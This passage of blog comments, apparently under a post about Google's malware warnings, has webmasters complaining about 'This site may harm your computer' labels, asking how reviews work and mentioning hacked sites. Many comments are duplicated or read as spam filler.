    I think Malware developers are obviously good friends with terrorists and drug dealers. Really. They’re just as bad these days – there antics are totally ridiculous, and I have a suspicion this problem is going to come to a major escalation soon and they are going to be tried as the criminals they are.
    Thanks for the heads up. I hope that the company that hosts my site is at least able to stop this from happening.

  128. Google Gadgets are mini-applications that work with the Google homepage, Google Desktop, or any page on the web. They can range from simple HTML to complex applications, and can be a calendar, a weather globe, a media player, or anything else you can dream up.

  129. My site got hacked a little while ago using a cpanel/whm exploit. Every page in the site had a tag like that added at the bottom

  130. One of my frustrations reading here is the comments/posts from those who hijack any number of threads wanting help from you with what they perceive as their specific problem for their site – they should be deleted as imagine how many more will happen if word got ou

  131. thanks

    How does it take for Google to review when a web site request for review?

    It seems that Google now has its own internal review instead of relying on StopBadware.org.

  132. Would it not make more sense for Google to remove “suspect” pages from its index and contact web masters direct, enabling a professional investigation to take place? The current process is humiliating and frankly libellous.Surely a company with Google’s wealth and resources could handle matters in a more diplomatic and considerate matter.
    Google and its little side-kick, stopbadware.org, are both apparently incapable of responding to emails too.
    There are MILLIONS of sites on Google and thousands which do warrant tighter control – mine is a business site and is not one of them.

  133. I think what you are doing is great!!! I want to use your color scheme at my sites…

  134. Is there a limit of how many reviews you can request before google
    permanently labels your site as bad? I’ve submitted my site
    myprocodes.com 3 times already and every time it was rejected. Each
    time I’ve removed more and more to the point where I no longer have
    any banner ads left.

    And if anybody can spot what might be getting us rejected I would
    truly appreciate it. I’ve spent so much time trying to figure this
    out and have come up empty.

    Thank you.

  135. How does it take for Google to review when a web site request for review?

  136. It’s unuseful.Because malware filter is weak.

  137. It seems that Google now has its own internal review instead of relying on StopBadware.org.

  138. It seems absolutely hillarous to me that people still think search can be determined worldwide out of a few people in silicon valley. Locall knowledge and culture is ignored,

  139. nice apologies and articles.
    thanks
    best regards

  140. It seems absolutely hillarous to me that people still think search can be determined worldwide out of a few people in silicon valley. Locall knowledge and culture is ignored,

  141. Matt;

    I wanted to find out which datacenter some results I was seeing today were on, but when I tried to ping Google it gave me the wrong info. Then I tried checking the info in the cache, but that too was wrong. Any ideas on another way I can find out which datacenter these results came from? 🙂

    Thanks!

  142. Thanks

  143. How does it take for Google to review when a web site request for review?

  144. Been getting the “This site may harm your computer.” warning on Google
    search for the past few weeks. I can’t find anything. My appeal to
    stopbadware.org was rejected because they said I still have malware.

    I’m getting emails from visitors telling me they’re being slammed with
    popups trying to download activex junk onto their computers. I’ve
    never had or allowed popups on the site. Site seems perfectly fine
    when I access (no popups on my end) WTF?

    My tech guys can’t find anything? They think it may be one of the ad
    networks I’m running but I’m just not sure (they’re all major networks
    and I don’t know how they’d let something like this slip by) Can
    anyone help or point me in a direction where I can find some help?

    Nick

  145. just a remark: the favicon remains when I choose not to display it (hotmail)

  146. Is there a limit of how many reviews you can request before google
    permanently labels your site as bad? I’ve submitted my site
    myprocodes.com 3 times already and every time it was rejected.

  147. Is there a limit of how many reviews you can request before google
    permanently labels your site as bad? I’ve submitted my site
    myprocodes.com 3 times already and every time it was rejected. Each
    time I’ve removed more and more to the point where I no longer have
    any banner ads left.

    And if anybody can spot what might be getting us rejected I would
    truly appreciate it. I’ve spent so much time trying to figure this
    out and have come up empty.

    this is amazing think thanks

  148. limit of how many reviews you can request before google
    permanently

  149. Looks like the webmaster console team has now added example urls for sites that we think are hosting malware.

  150. My site got hacked a little while ago using a cpanel/whm exploit.

  151. Nice selection, though Hittail won’t really help me, as I blog in hungarian, not english.

  152. Matt,
    The URL here is not the issue, but a blogger hijacked a Press Release and though the blog is a URL completely unrelated to my site, the Site May Harm Your computer message is positioned directly under my clients name:

    Avery® Print and Mail Center Announces ‘Direct Mail Dish’ Blog (PRWeb)
    This site may harm your computer.
    PRWeb – Direct Mail Marketing Mogul Pays More to Save Trees A direct mail postcard company says despite higher costs, saving trees is a must. …
    blogged.sbmarketingservices.com/blogs/postcard-printers/115247/avery-print-and-mail/ – Similar pages – Note this

    Thanks for reviewing. Best, Lisa

  153. My site got hacked a little while ago using a cpanel/whm exploit I’m not sure

  154. Then I tried checking the info in the cache, but that too was wrong

  155. “I think this process can still be improved, but at the same time, we’ve heard very positive reactions from users that don’t want to click on potential malware pages”
    Surely Matt

    Great info, nice article.
    Thanks

  156. Thanks thi information.

    I think this process can still be improved, but at the same time, we’ve heard very positive reactions from users that don’t want to click on potential malware pages. Ultimately I think it helps to alert webmasters that they may be serving up malware to their visitors, because if a site has been hacked it’s good to know about that quickly.

  157. The strange thing is that my stats show I was getting huge traffic from a folder on my site to a specific post. It’s beyond me to figure it out so I deleted the folder instead.

  158. Then I tried checking the info in the cache, but that too was wrong. Any ideas on another way I can find out which datacenter these results came from

  159. Dan Farmer was wasted, please have him on again. I loved the questions geared towards the writing process
    very good

  160. Luckily I noticed it within a day and restored the backup but it could be that many sites are suffering from this due to this hack.

  161. Malware, this is really one of the darkest spot in the web.

  162. Matt,
    The URL here is not the issue, but a blogger hijacked a Press Release and though the blog is a URL completely unrelated to my site, the Site May Harm Your computer message is positioned directly under my clients name:

    Avery® Print and Mail Center Announces ‘Direct Mail Dish’ Blog (PRWeb)
    This site may harm your computer.
    PRWeb – Direct Mail Marketing Mogul Pays More to Save Trees A direct mail postcard company says despite higher costs, saving trees is a must. …
    blogged.sbmarketingservices.com/blogs/postcard-printers/115247/avery-print-and-mail/ – Similar pages – Note this

    Thanks for reviewing. Best, Lisa

    ı think this is very very good idea

  163. The strange thing is that my stats show I was getting huge traffic from a folder on my site to a specific post. It’s beyond me to figure it out so I deleted the folder instead.

  164. Is this type of Javascript likely to raise a malware alarm by itself, or only if the decoded content is itself far from benign?

  165. my stats show I was getting huge traffic from a folder on my site to a specific post. It’s beyond me to figure it out so I deleted the folder instead.

  166. Nice selection, though Hittail won’t really help me, as I blog in hungarian, not english.

  167. this is
    really one of the darkest spot in the web.

  168. Today I am ranking for things like “Prozac Medications”, ringtones and porn in Google search.

    Someone is using my blog to game Google and doing very well at it. I have screenshots, stats, IP’s to show if anyone there at Google is interested.

  169. so saying that a human will do a more through job checking than a program, you acknowledge the possibility does exist of a false positive/negative from the program even though you’ve never seen one, correct?

    I’d go so far as to say there’s no such thing as a perfect bug free program it just doesn’t exist

  170. Like one of the other commenter’s noted, I believe that updating the WP would disable any type of malware found within a generic source code.

  171. Man, I knew all about malware infecting your computer – but infecting your site?? That’s not good news! I need to research this more – I never knew there was this kind of risk!
    I think Malware developers are obviously good friends with terrorists and drug dealers. Really. They’re just as bad these days – there antics are totally ridiculous, and I have a suspicion this problem is going to come to a major escalation soon and they are going to be tried as the criminals they are.
    Thanks for the heads up. I hope that the company that hosts my site is at least able to stop this from happening.

  172. Matt,
    The URL here is not the issue, but a blogger hijacked a Press Release and though the blog is a URL completely unrelated to my site, the Site May Harm Your computer message is positioned directly under my clients name:

    Avery® Print and Mail Center Announces ‘Direct Mail Dish’ Blog (PRWeb)
    This site may harm your computer.
    PRWeb – Direct Mail Marketing Mogul Pays More to Save Trees A direct mail postcard company says despite higher costs, saving trees is a must. …
    blogged.sbmarketingservices.com/blogs/postcard-printers/115247/avery-print-and-mail/ – Similar pages – Note this

    Thanks for reviewing. Best, Lisa

    ı think this is very very good idea

css.php